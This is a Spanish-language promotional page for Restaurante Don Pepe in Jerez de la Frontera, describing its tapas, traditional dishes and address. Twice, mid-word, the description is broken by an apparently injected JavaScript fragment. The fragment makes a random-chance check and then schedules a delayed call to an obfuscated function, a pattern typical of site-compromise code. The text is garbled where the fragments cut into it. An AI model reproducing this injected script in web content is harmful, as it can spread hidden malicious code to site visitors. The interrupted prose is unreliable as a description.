Restaurante Don Pepe

18062015232109731219Desde su inauguración en 1988, el restaurante Don Pepe, ha llevado una labor de restauración enriqueciendo desde los fogones con originales creaciones la ya suculenta gastronomía de la zona de Jerez de la Frontera (Cádiz). En DON PEPE cumplen con la tradición culinaria de la tierra a la que pertenecen, ofreciendo a sus clientes los platos de la cocina tradicional acompañados por una conversación animada por el vino de la tierra y las suculentas tapas que son bandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andera de la restauración jerezana.En la barra podrá disfrutar del extraordinario jamón de bellota y toda la gama de chacinas ibéricas, los chicharrones al estilo antiguo, el queso puro de oveja y toda una gama de frituras de pescados, delicias de carne y marisco de la bahía, así como los sabrosos aliños condimentados con puro aceite de oliva y vinagre de jerez, todo ello acompañado por pan de campo.Ya si lo desean pueden pasar al comedor donde será atendido por un personal joven, agradable y profesional que le aconsejará para que su elección sea la más acertada. Los platos combinan la cocina tradicional con una cocina creativa y de nuevos sabores.En DON PEPE la máxima preocupación es ofrecer a los clientes una amplia gama de platos elaborados con sabor, sencillez y buen gusto, como pueden ser el revuelto de espárragos trigueros con jamón hasta el sabroso rodaballo al cava, pasandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando por el rape en salsa Don Pepe, el rabo de toro….

18062015141740915005RESTAURANTE DON PEPE

Carretera de Arcos, k. 1,6 Jerez de la Frontera (Cádiz)

Telf. 956 180 564 www.restaurantedonpepe.es